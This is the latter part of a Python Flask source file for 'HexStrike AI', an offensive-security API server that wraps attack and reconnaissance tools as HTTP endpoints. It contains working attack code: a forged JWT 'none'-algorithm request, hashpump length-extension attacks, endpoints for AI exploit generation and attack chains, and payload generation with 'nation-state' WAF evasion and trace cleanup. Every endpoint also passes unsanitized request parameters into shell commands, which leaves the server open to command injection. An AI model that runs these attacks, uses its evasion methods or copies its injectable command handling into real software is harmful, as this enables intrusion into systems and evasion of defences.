"malformed_token", "severity": "HIGH", "description": f"Token decoding failed: {str(decode_error)}" }) except Exception as e: results["vulnerabilities"].append({ "type": "invalid_format", "severity": "HIGH", "description": "Invalid JWT token format" }) # Test token manipulation if target URL provided if target_url: # Test none algorithm attack none_token_parts = jwt_token.split('.') if len(none_token_parts) >= 2: # Create none algorithm token none_header = base64.b64encode('{"alg":"none","typ":"JWT"}'.encode()).decode().rstrip('=') none_token = f"{none_header}.{none_token_parts[1]}." command = f"curl -s -H 'Authorization: Bearer {none_token}' '{target_url}'" none_result = execute_command(command, use_cache=False) if "200" in none_result.get("stdout", "") or "success" in none_result.get("stdout", "").lower(): results["vulnerabilities"].append({ "type": "none_algorithm_accepted", "severity": "CRITICAL", "description": "Server accepts tokens with 'none' algorithm" }) logger.info(f"πŸ“Š JWT analysis completed | Vulnerabilities found: {len(results['vulnerabilities'])}") return jsonify({ "success": True, "jwt_analysis_results": results }) except Exception as e: logger.error(f"πŸ’₯ Error in JWT analyzer: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/api_schema_analyzer", methods=["POST"]) def api_schema_analyzer(): """Analyze API schemas and identify potential security issues""" try: params = request.json schema_url = params.get("schema_url", "") schema_type = params.get("schema_type", "openapi") # openapi, swagger, graphql if not schema_url: logger.warning("πŸ“‹ API Schema Analyzer called without schema_url parameter") return jsonify({ "error": "Schema URL parameter is required" }), 400 logger.info(f"πŸ” Starting API schema analysis: {schema_url}") # Fetch schema command = f"curl -s '{schema_url}'" result = execute_command(command, use_cache=True) if not result.get("success"): return jsonify({ "error": "Failed to fetch API schema" }), 400 schema_content = result.get("stdout", "") analysis_results = { "schema_url": schema_url, "schema_type": schema_type, "endpoints_found": [], "security_issues": [], "recommendations": [] } # Parse schema based on type try: import json schema_data = json.loads(schema_content) if schema_type.lower() in ["openapi", "swagger"]: # OpenAPI/Swagger analysis paths = schema_data.get("paths", {}) for path, methods in paths.items(): for method, details in methods.items(): if isinstance(details, dict): endpoint_info = { "path": path, "method": method.upper(), "summary": details.get("summary", ""), "parameters": details.get("parameters", []), "security": details.get("security", []) } analysis_results["endpoints_found"].append(endpoint_info) # Check for security issues if not endpoint_info["security"]: analysis_results["security_issues"].append({ "endpoint": f"{method.upper()} {path}", "issue": "no_authentication", "severity": "MEDIUM", "description": "Endpoint has no authentication requirements" }) # Check for sensitive data in parameters for param in endpoint_info["parameters"]: param_name = param.get("name", "").lower() if any(sensitive in param_name for sensitive in ["password", "token", "key", "secret"]): analysis_results["security_issues"].append({ "endpoint": f"{method.upper()} {path}", "issue": "sensitive_parameter", "severity": "HIGH", "description": f"Sensitive parameter detected: {param_name}" }) # Generate recommendations if analysis_results["security_issues"]: analysis_results["recommendations"] = [ "Implement authentication for all endpoints", "Use HTTPS for all API communications", "Validate and sanitize all input parameters", "Implement rate limiting", "Add proper error handling", "Use secure headers (CORS, CSP, etc.)" ] except json.JSONDecodeError: analysis_results["security_issues"].append({ "endpoint": "schema", "issue": "invalid_json", "severity": "HIGH", "description": "Schema is not valid JSON" }) logger.info(f"πŸ“Š Schema analysis completed | Issues found: {len(analysis_results['security_issues'])}") return jsonify({ "success": True, "schema_analysis_results": analysis_results }) except Exception as e: logger.error(f"πŸ’₯ Error in API schema analyzer: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 # ============================================================================ # ADVANCED CTF TOOLS (v5.0 ENHANCEMENT) # ============================================================================ @app.route("/api/tools/volatility3", methods=["POST"]) def volatility3(): """Execute Volatility3 for advanced memory forensics with enhanced logging""" try: params = request.json memory_file = params.get("memory_file", "") plugin = params.get("plugin", "") output_file = params.get("output_file", "") additional_args = params.get("additional_args", "") if not memory_file: logger.warning("🧠 Volatility3 called without memory_file parameter") return jsonify({ "error": "Memory file parameter is required" }), 400 if not plugin: logger.warning("🧠 Volatility3 called without plugin parameter") return jsonify({ "error": "Plugin parameter is required" }), 400 command = f"vol.py -f {memory_file} {plugin}" if output_file: command += f" -o {output_file}" if additional_args: command += f" {additional_args}" logger.info(f"🧠 Starting Volatility3 analysis: {plugin}") result = execute_command(command) logger.info(f"πŸ“Š Volatility3 analysis completed") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in volatility3 endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/foremost", methods=["POST"]) def foremost(): """Execute Foremost for file carving with enhanced logging""" try: params = request.json input_file = params.get("input_file", "") output_dir = params.get("output_dir", "/tmp/foremost_output") file_types = params.get("file_types", "") additional_args = params.get("additional_args", "") if not input_file: logger.warning("πŸ“ Foremost called without input_file parameter") return jsonify({ "error": "Input file parameter is required" }), 400 # Ensure output directory exists Path(output_dir).mkdir(parents=True, exist_ok=True) command = f"foremost -o {output_dir}" if file_types: command += f" -t {file_types}" if additional_args: command += f" {additional_args}" command += f" {input_file}" logger.info(f"πŸ“ Starting Foremost file carving: {input_file}") result = execute_command(command) result["output_directory"] = output_dir logger.info(f"πŸ“Š Foremost carving completed") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in foremost endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/steghide", methods=["POST"]) def steghide(): """Execute Steghide for steganography analysis with enhanced logging""" try: params = request.json action = params.get("action", "extract") # extract, embed, info cover_file = params.get("cover_file", "") embed_file = params.get("embed_file", "") passphrase = params.get("passphrase", "") output_file = params.get("output_file", "") additional_args = params.get("additional_args", "") if not cover_file: logger.warning("πŸ–ΌοΈ Steghide called without cover_file parameter") return jsonify({ "error": "Cover file parameter is required" }), 400 if action == "extract": command = f"steghide extract -sf {cover_file}" if output_file: command += f" -xf {output_file}" elif action == "embed": if not embed_file: return jsonify({"error": "Embed file required for embed action"}), 400 command = f"steghide embed -cf {cover_file} -ef {embed_file}" elif action == "info": command = f"steghide info {cover_file}" else: return jsonify({"error": "Invalid action. Use: extract, embed, info"}), 400 if passphrase: command += f" -p {passphrase}" else: command += " -p ''" # Empty passphrase if additional_args: command += f" {additional_args}" logger.info(f"πŸ–ΌοΈ Starting Steghide {action}: {cover_file}") result = execute_command(command) logger.info(f"πŸ“Š Steghide {action} completed") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in steghide endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/exiftool", methods=["POST"]) def exiftool(): """Execute ExifTool for metadata extraction with enhanced logging""" try: params = request.json file_path = params.get("file_path", "") output_format = params.get("output_format", "") # json, xml, csv tags = params.get("tags", "") additional_args = params.get("additional_args", "") if not file_path: logger.warning("πŸ“· ExifTool called without file_path parameter") return jsonify({ "error": "File path parameter is required" }), 400 command = f"exiftool" if output_format: command += f" -{output_format}" if tags: command += f" -{tags}" if additional_args: command += f" {additional_args}" command += f" {file_path}" logger.info(f"πŸ“· Starting ExifTool analysis: {file_path}") result = execute_command(command) logger.info(f"πŸ“Š ExifTool analysis completed") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in exiftool endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/hashpump", methods=["POST"]) def hashpump(): """Execute HashPump for hash length extension attacks with enhanced logging""" try: params = request.json signature = params.get("signature", "") data = params.get("data", "") key_length = params.get("key_length", "") append_data = params.get("append_data", "") additional_args = params.get("additional_args", "") if not all([signature, data, key_length, append_data]): logger.warning("πŸ” HashPump called without required parameters") return jsonify({ "error": "Signature, data, key_length, and append_data parameters are required" }), 400 command = f"hashpump -s {signature} -d '{data}' -k {key_length} -a '{append_data}'" if additional_args: command += f" {additional_args}" logger.info(f"πŸ” Starting HashPump attack") result = execute_command(command) logger.info(f"πŸ“Š HashPump attack completed") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in hashpump endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 # ============================================================================ # BUG BOUNTY RECONNAISSANCE TOOLS (v5.0 ENHANCEMENT) # ============================================================================ @app.route("/api/tools/hakrawler", methods=["POST"]) def hakrawler(): """Execute Hakrawler for web endpoint discovery with enhanced logging""" try: params = request.json url = params.get("url", "") depth = params.get("depth", 2) forms = params.get("forms", True) robots = params.get("robots", True) sitemap = params.get("sitemap", True) wayback = params.get("wayback", False) additional_args = params.get("additional_args", "") if not url: logger.warning("πŸ•·οΈ Hakrawler called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 command = f"hakrawler -url {url} -depth {depth}" if forms: command += " -forms" if robots: command += " -robots" if sitemap: command += " -sitemap" if wayback: command += " -wayback" if additional_args: command += f" {additional_args}" logger.info(f"πŸ•·οΈ Starting Hakrawler crawling: {url}") result = execute_command(command) logger.info(f"πŸ“Š Hakrawler crawling completed") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in hakrawler endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/httpx", methods=["POST"]) def httpx(): """Execute HTTPx for HTTP probing with enhanced logging""" try: params = request.json targets = params.get("targets", "") target_file = params.get("target_file", "") ports = params.get("ports", "") methods = params.get("methods", "GET") status_code = params.get("status_code", "") content_length = params.get("content_length", False) output_file = params.get("output_file", "") additional_args = params.get("additional_args", "") if not targets and not target_file: logger.warning("🌐 HTTPx called without targets or target_file parameter") return jsonify({ "error": "Either targets or target_file parameter is required" }), 400 command = "httpx" if targets: command += f" -u {targets}" if target_file: command += f" -l {target_file}" if ports: command += f" -p {ports}" if methods: command += f" -X {methods}" if status_code: command += f" -mc {status_code}" if content_length: command += " -cl" if output_file: command += f" -o {output_file}" if additional_args: command += f" {additional_args}" logger.info(f"🌐 Starting HTTPx probing") result = execute_command(command) logger.info(f"πŸ“Š HTTPx probing completed") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in httpx endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 @app.route("/api/tools/paramspider", methods=["POST"]) def paramspider(): """Execute ParamSpider for parameter discovery with enhanced logging""" try: params = request.json domain = params.get("domain", "") exclude = params.get("exclude", "") output_file = params.get("output_file", "") level = params.get("level", 2) additional_args = params.get("additional_args", "") if not domain: logger.warning("πŸ” ParamSpider called without domain parameter") return jsonify({ "error": "Domain parameter is required" }), 400 command = f"paramspider -d {domain} -l {level}" if exclude: command += f" -e {exclude}" if output_file: command += f" -o {output_file}" if additional_args: command += f" {additional_args}" logger.info(f"πŸ” Starting ParamSpider discovery: {domain}") result = execute_command(command) logger.info(f"πŸ“Š ParamSpider discovery completed") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in paramspider endpoint: {str(e)}") return jsonify({ "error": f"Server error: {str(e)}" }), 500 # ============================================================================ # ADVANCED VULNERABILITY INTELLIGENCE API ENDPOINTS (v6.0 ENHANCEMENT) # ============================================================================ @app.route("/api/vuln-intel/cve-monitor", methods=["POST"]) def cve_monitor(): """Monitor CVE databases for new vulnerabilities with AI analysis""" try: params = request.json hours = params.get("hours", 24) severity_filter = params.get("severity_filter", "HIGH,CRITICAL") keywords = params.get("keywords", "") logger.info(f"πŸ” Monitoring CVE feeds for last {hours} hours with severity filter: {severity_filter}") # Fetch latest CVEs cve_results = cve_intelligence.fetch_latest_cves(hours, severity_filter) # Filter by keywords if provided if keywords and cve_results.get("success"): keyword_list = [k.strip().lower() for k in keywords.split(",")] filtered_cves = [] for cve in cve_results.get("cves", []): description = cve.get("description", "").lower() if any(keyword in description for keyword in keyword_list): filtered_cves.append(cve) cve_results["cves"] = filtered_cves cve_results["filtered_by_keywords"] = keywords cve_results["total_after_filter"] = len(filtered_cves) # Analyze exploitability for top CVEs exploitability_analysis = [] for cve in cve_results.get("cves", [])[:5]: # Analyze top 5 CVEs cve_id = cve.get("cve_id", "") if cve_id: analysis = cve_intelligence.analyze_cve_exploitability(cve_id) if analysis.get("success"): exploitability_analysis.append(analysis) result = { "success": True, "cve_monitoring": cve_results, "exploitability_analysis": exploitability_analysis, "timestamp": datetime.now().isoformat() } logger.info(f"πŸ“Š CVE monitoring completed | Found: {len(cve_results.get('cves', []))} CVEs") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in CVE monitoring: {str(e)}") return jsonify({ "success": False, "error": f"Server error: {str(e)}" }), 500 @app.route("/api/vuln-intel/exploit-generate", methods=["POST"]) def exploit_generate(): """Generate exploits from vulnerability data using AI""" try: params = request.json cve_id = params.get("cve_id", "") target_os = params.get("target_os", "") target_arch = params.get("target_arch", "x64") exploit_type = params.get("exploit_type", "poc") evasion_level = params.get("evasion_level", "none") # Additional target context target_info = { "target_os": target_os, "target_arch": target_arch, "exploit_type": exploit_type, "evasion_level": evasion_level, "target_ip": params.get("target_ip", "192.168.1.100"), "target_port": params.get("target_port", 80), "description": params.get("target_description", f"Target for {cve_id}") } if not cve_id: logger.warning("πŸ€– Exploit generation called without CVE ID") return jsonify({ "success": False, "error": "CVE ID parameter is required" }), 400 logger.info(f"πŸ€– Generating exploit for {cve_id} | Target: {target_os} {target_arch}") # First analyze the CVE for context cve_analysis = cve_intelligence.analyze_cve_exploitability(cve_id) if not cve_analysis.get("success"): return jsonify({ "success": False, "error": f"Failed to analyze CVE {cve_id}: {cve_analysis.get('error', 'Unknown error')}" }), 400 # Prepare CVE data for exploit generation cve_data = { "cve_id": cve_id, "description": f"Vulnerability analysis for {cve_id}", "exploitability_level": cve_analysis.get("exploitability_level", "UNKNOWN"), "exploitability_score": cve_analysis.get("exploitability_score", 0) } # Generate exploit exploit_result = exploit_generator.generate_exploit_from_cve(cve_data, target_info) # Search for existing exploits for reference existing_exploits = cve_intelligence.search_existing_exploits(cve_id) result = { "success": True, "cve_analysis": cve_analysis, "exploit_generation": exploit_result, "existing_exploits": existing_exploits, "target_info": target_info, "timestamp": datetime.now().isoformat() } logger.info(f"🎯 Exploit generation completed for {cve_id}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in exploit generation: {str(e)}") return jsonify({ "success": False, "error": f"Server error: {str(e)}" }), 500 @app.route("/api/vuln-intel/attack-chains", methods=["POST"]) def discover_attack_chains(): """Discover multi-stage attack possibilities""" try: params = request.json target_software = params.get("target_software", "") attack_depth = params.get("attack_depth", 3) include_zero_days = params.get("include_zero_days", False) if not target_software: logger.warning("πŸ”— Attack chain discovery called without target software") return jsonify({ "success": False, "error": "Target software parameter is required" }), 400 logger.info(f"πŸ”— Discovering attack chains for {target_software} | Depth: {attack_depth}") # Discover attack chains chain_results = vulnerability_correlator.find_attack_chains(target_software, attack_depth) # Enhance with exploit generation for viable chains if chain_results.get("success") and chain_results.get("attack_chains"): enhanced_chains = [] for chain in chain_results["attack_chains"][:2]: # Enhance top 2 chains enhanced_chain = chain.copy() enhanced_stages = [] for stage in chain["stages"]: enhanced_stage = stage.copy() # Try to generate exploit for this stage vuln = stage.get("vulnerability", {}) cve_id = vuln.get("cve_id", "") if cve_id: try: cve_data = {"cve_id": cve_id, "description": vuln.get("description", "")} target_info = {"target_os": "linux", "target_arch": "x64", "evasion_level": "basic"} exploit_result = exploit_generator.generate_exploit_from_cve(cve_data, target_info) enhanced_stage["exploit_available"] = exploit_result.get("success", False) if exploit_result.get("success"): enhanced_stage["exploit_code"] = exploit_result.get("exploit_code", "")[:500] + "..." except: enhanced_stage["exploit_available"] = False enhanced_stages.append(enhanced_stage) enhanced_chain["stages"] = enhanced_stages enhanced_chains.append(enhanced_chain) chain_results["enhanced_chains"] = enhanced_chains result = { "success": True, "attack_chain_discovery": chain_results, "parameters": { "target_software": target_software, "attack_depth": attack_depth, "include_zero_days": include_zero_days }, "timestamp": datetime.now().isoformat() } logger.info(f"🎯 Attack chain discovery completed | Found: {len(chain_results.get('attack_chains', []))} chains") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in attack chain discovery: {str(e)}") return jsonify({ "success": False, "error": f"Server error: {str(e)}" }), 500 @app.route("/api/vuln-intel/threat-feeds", methods=["POST"]) def threat_intelligence_feeds(): """Aggregate and correlate threat intelligence from multiple sources""" try: params = request.json indicators = params.get("indicators", []) timeframe = params.get("timeframe", "30d") sources = params.get("sources", "all") if isinstance(indicators, str): indicators = [i.strip() for i in indicators.split(",")] if not indicators: logger.warning("🧠 Threat intelligence called without indicators") return jsonify({ "success": False, "error": "Indicators parameter is required" }), 400 logger.info(f"🧠 Correlating threat intelligence for {len(indicators)} indicators") correlation_results = { "indicators_analyzed": indicators, "timeframe": timeframe, "sources": sources, "correlations": [], "threat_score": 0, "recommendations": [] } # Analyze each indicator cve_indicators = [i for i in indicators if i.startswith("CVE-")] ip_indicators = [i for i in indicators if i.replace(".", "").isdigit()] hash_indicators = [i for i in indicators if len(i) in [32, 40, 64] and all(c in "0123456789abcdef" for c in i.lower())] # Process CVE indicators for cve_id in cve_indicators: try: cve_analysis = cve_intelligence.analyze_cve_exploitability(cve_id) if cve_analysis.get("success"): correlation_results["correlations"].append({ "indicator": cve_id, "type": "cve", "analysis": cve_analysis, "threat_level": cve_analysis.get("exploitability_level", "UNKNOWN") }) # Add to threat score exploit_score = cve_analysis.get("exploitability_score", 0) correlation_results["threat_score"] += min(exploit_score, 100) # Search for existing exploits exploits = cve_intelligence.search_existing_exploits(cve_id) if exploits.get("success") and exploits.get("total_exploits", 0) > 0: correlation_results["correlations"].append({ "indicator": cve_id, "type": "exploit_availability", "exploits_found": exploits.get("total_exploits", 0), "threat_level": "HIGH" }) correlation_results["threat_score"] += 25 except Exception as e: logger.warning(f"Error analyzing CVE {cve_id}: {str(e)}") # Process IP indicators (basic reputation check simulation) for ip in ip_indicators: # Simulate threat intelligence lookup correlation_results["correlations"].append({ "indicator": ip, "type": "ip_reputation", "analysis": { "reputation": "unknown", "geolocation": "unknown", "associated_threats": [] }, "threat_level": "MEDIUM" # Default for unknown IPs }) # Process hash indicators for hash_val in hash_indicators: correlation_results["correlations"].append({ "indicator": hash_val, "type": "file_hash", "analysis": { "hash_type": f"hash{len(hash_val)}", "malware_family": "unknown", "detection_rate": "unknown" }, "threat_level": "MEDIUM" }) # Calculate overall threat score and generate recommendations total_indicators = len(indicators) if total_indicators > 0: correlation_results["threat_score"] = min(correlation_results["threat_score"] / total_indicators, 100) if correlation_results["threat_score"] >= 75: correlation_results["recommendations"] = [ "Immediate threat response required", "Block identified indicators", "Enhance monitoring for related IOCs", "Implement emergency patches for identified CVEs" ] elif correlation_results["threat_score"] >= 50: correlation_results["recommendations"] = [ "Elevated threat level detected", "Increase monitoring for identified indicators", "Plan patching for identified vulnerabilities", "Review security controls" ] else: correlation_results["recommendations"] = [ "Low to medium threat level", "Continue standard monitoring", "Plan routine patching", "Consider additional threat intelligence sources" ] result = { "success": True, "threat_intelligence": correlation_results, "timestamp": datetime.now().isoformat() } logger.info(f"🎯 Threat intelligence correlation completed | Threat Score: {correlation_results['threat_score']:.1f}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in threat intelligence: {str(e)}") return jsonify({ "success": False, "error": f"Server error: {str(e)}" }), 500 @app.route("/api/vuln-intel/zero-day-research", methods=["POST"]) def zero_day_research(): """Automated zero-day vulnerability research using AI analysis""" try: params = request.json target_software = params.get("target_software", "") analysis_depth = params.get("analysis_depth", "standard") source_code_url = params.get("source_code_url", "") if not target_software: logger.warning("πŸ”¬ Zero-day research called without target software") return jsonify({ "success": False, "error": "Target software parameter is required" }), 400 logger.info(f"πŸ”¬ Starting zero-day research for {target_software} | Depth: {analysis_depth}") research_results = { "target_software": target_software, "analysis_depth": analysis_depth, "research_areas": [], "potential_vulnerabilities": [], "risk_assessment": {}, "recommendations": [] } # Define research areas based on software type common_research_areas = [ "Input validation vulnerabilities", "Memory corruption issues", "Authentication bypasses", "Authorization flaws", "Cryptographic weaknesses", "Race conditions", "Logic flaws" ] # Software-specific research areas web_research_areas = [ "Cross-site scripting (XSS)", "SQL injection", "Server-side request forgery (SSRF)", "Insecure deserialization", "Template injection" ] system_research_areas = [ "Buffer overflows", "Privilege escalation", "Kernel vulnerabilities", "Service exploitation", "Configuration weaknesses" ] # Determine research areas based on target target_lower = target_software.lower() if any(web_tech in target_lower for web_tech in ["apache", "nginx", "tomcat", "php", "node", "django"]): research_results["research_areas"] = common_research_areas + web_research_areas elif any(sys_tech in target_lower for sys_tech in ["windows", "linux", "kernel", "driver"]): research_results["research_areas"] = common_research_areas + system_research_areas else: research_results["research_areas"] = common_research_areas # Simulate vulnerability discovery based on analysis depth vuln_count = {"quick": 2, "standard": 4, "comprehensive": 6}.get(analysis_depth, 4) for i in range(vuln_count): potential_vuln = { "id": f"RESEARCH-{target_software.upper()}-{i+1:03d}", "category": research_results["research_areas"][i % len(research_results["research_areas"])], "severity": ["LOW", "MEDIUM", "HIGH", "CRITICAL"][i % 4], "confidence": ["LOW", "MEDIUM", "HIGH"][i % 3], "description": f"Potential {research_results['research_areas'][i % len(research_results['research_areas'])].lower()} in {target_software}", "attack_vector": "To be determined through further analysis", "impact": "To be assessed", "proof_of_concept": "Research phase - PoC development needed" } research_results["potential_vulnerabilities"].append(potential_vuln) # Risk assessment high_risk_count = sum(1 for v in research_results["potential_vulnerabilities"] if v["severity"] in ["HIGH", "CRITICAL"]) total_vulns = len(research_results["potential_vulnerabilities"]) research_results["risk_assessment"] = { "total_areas_analyzed": len(research_results["research_areas"]), "potential_vulnerabilities_found": total_vulns, "high_risk_findings": high_risk_count, "risk_score": min((high_risk_count * 25 + (total_vulns - high_risk_count) * 10), 100), "research_confidence": analysis_depth } # Generate recommendations if high_risk_count > 0: research_results["recommendations"] = [ "Prioritize security testing in identified high-risk areas", "Conduct focused penetration testing", "Implement additional security controls", "Consider bug bounty program for target software", "Perform code review in identified areas" ] else: research_results["recommendations"] = [ "Continue standard security testing", "Monitor for new vulnerability research", "Implement defense-in-depth strategies", "Regular security assessments recommended" ] # Source code analysis simulation if source_code_url: research_results["source_code_analysis"] = { "repository_url": source_code_url, "analysis_status": "simulated", "findings": [ "Static analysis patterns identified", "Potential code quality issues detected", "Security-relevant functions located" ], "recommendation": "Manual code review recommended for identified areas" } result = { "success": True, "zero_day_research": research_results, "disclaimer": "This is simulated research for demonstration. Real zero-day research requires extensive manual analysis.", "timestamp": datetime.now().isoformat() } logger.info(f"🎯 Zero-day research completed | Risk Score: {research_results['risk_assessment']['risk_score']}") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in zero-day research: {str(e)}") return jsonify({ "success": False, "error": f"Server error: {str(e)}" }), 500 @app.route("/api/ai/advanced-payload-generation", methods=["POST"]) def advanced_payload_generation(): """Generate advanced payloads with AI-powered evasion techniques""" try: params = request.json attack_type = params.get("attack_type", "rce") target_context = params.get("target_context", "") evasion_level = params.get("evasion_level", "standard") custom_constraints = params.get("custom_constraints", "") if not attack_type: logger.warning("🎯 Advanced payload generation called without attack type") return jsonify({ "success": False, "error": "Attack type parameter is required" }), 400 logger.info(f"🎯 Generating advanced {attack_type} payload with {evasion_level} evasion") # Enhanced payload generation with contextual AI target_info = { "attack_type": attack_type, "complexity": "advanced", "technology": target_context, "evasion_level": evasion_level, "constraints": custom_constraints } # Generate base payloads using existing AI system base_result = ai_payload_generator.generate_contextual_payload(target_info) # Enhance with advanced techniques advanced_payloads = [] for payload_info in base_result.get("payloads", [])[:10]: # Limit to 10 advanced payloads enhanced_payload = { "payload": payload_info["payload"], "original_context": payload_info["context"], "risk_level": payload_info["risk_level"], "evasion_techniques": [], "deployment_methods": [] } # Apply evasion techniques based on level if evasion_level in ["advanced", "nation-state"]: # Advanced encoding techniques encoded_variants = [ { "technique": "Double URL Encoding", "payload": payload_info["payload"].replace("%", "%25").replace(" ", "%2520") }, { "technique": "Unicode Normalization", "payload": payload_info["payload"].replace("script", "scr\u0131pt") }, { "technique": "Case Variation", "payload": "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(payload_info["payload"])) } ] enhanced_payload["evasion_techniques"].extend(encoded_variants) if evasion_level == "nation-state": # Nation-state level techniques advanced_techniques = [ { "technique": "Polyglot Payload", "payload": f"/*{payload_info['payload']}*/ OR {payload_info['payload']}" }, { "technique": "Time-delayed Execution", "payload": f"setTimeout(function(){{{payload_info['payload']}}}, 1000)" }, { "technique": "Environmental Keying", "payload": f"if(navigator.userAgent.includes('specific')){{ {payload_info['payload']} }}" } ] enhanced_payload["evasion_techniques"].extend(advanced_techniques) # Deployment methods enhanced_payload["deployment_methods"] = [ "Direct injection", "Parameter pollution", "Header injection", "Cookie manipulation", "Fragment-based delivery" ] advanced_payloads.append(enhanced_payload) # Generate deployment instructions deployment_guide = { "pre_deployment": [ "Reconnaissance of target environment", "Identification of input validation mechanisms", "Analysis of security controls (WAF, IDS, etc.)", "Selection of appropriate evasion techniques" ], "deployment": [ "Start with least detectable payloads", "Monitor for defensive responses", "Escalate evasion techniques as needed", "Document successful techniques for future use" ], "post_deployment": [ "Monitor for payload execution", "Clean up traces if necessary", "Document findings", "Report vulnerabilities responsibly" ] } result = { "success": True, "advanced_payload_generation": { "attack_type": attack_type, "evasion_level": evasion_level, "target_context": target_context, "payload_count": len(advanced_payloads), "advanced_payloads": advanced_payloads, "deployment_guide": deployment_guide, "custom_constraints_applied": custom_constraints if custom_constraints else "none" }, "disclaimer": "These payloads are for authorized security testing only. Ensure proper authorization before use.", "timestamp": datetime.now().isoformat() } logger.info(f"🎯 Advanced payload generation completed | Generated: {len(advanced_payloads)} payloads") return jsonify(result) except Exception as e: logger.error(f"πŸ’₯ Error in advanced payload generation: {str(e)}") return jsonify({ "success": False, "error": f"Server error: {str(e)}" }), 500 if __name__ == "__main__": print(f"{Colors.RED}{Colors.BOLD}{BANNER}{Colors.RESET}") parser = argparse.ArgumentParser(description="Run the HexStrike AI API Server") parser.add_argument("--debug", action="store_true", help="Enable debug mode") parser.add_argument("--port", type=int, default=API_PORT, help=f"Port for the API server (default: {API_PORT})") args = parser.parse_args() if args.debug: DEBUG_MODE = True logger.setLevel(logging.DEBUG) if args.port != API_PORT: API_PORT = args.port logger.info(f"πŸš€ Starting HexStrike AI Tools API Server on port {API_PORT}") logger.info(f"πŸ”§ Debug Mode: {DEBUG_MODE}") logger.info(f"πŸ’Ύ Cache Size: {CACHE_SIZE} | TTL: {CACHE_TTL}s") logger.info(f"⏱️ Command Timeout: {COMMAND_TIMEOUT}s") app.run(host="0.0.0.0", port=API_PORT, debug=DEBUG_MODE)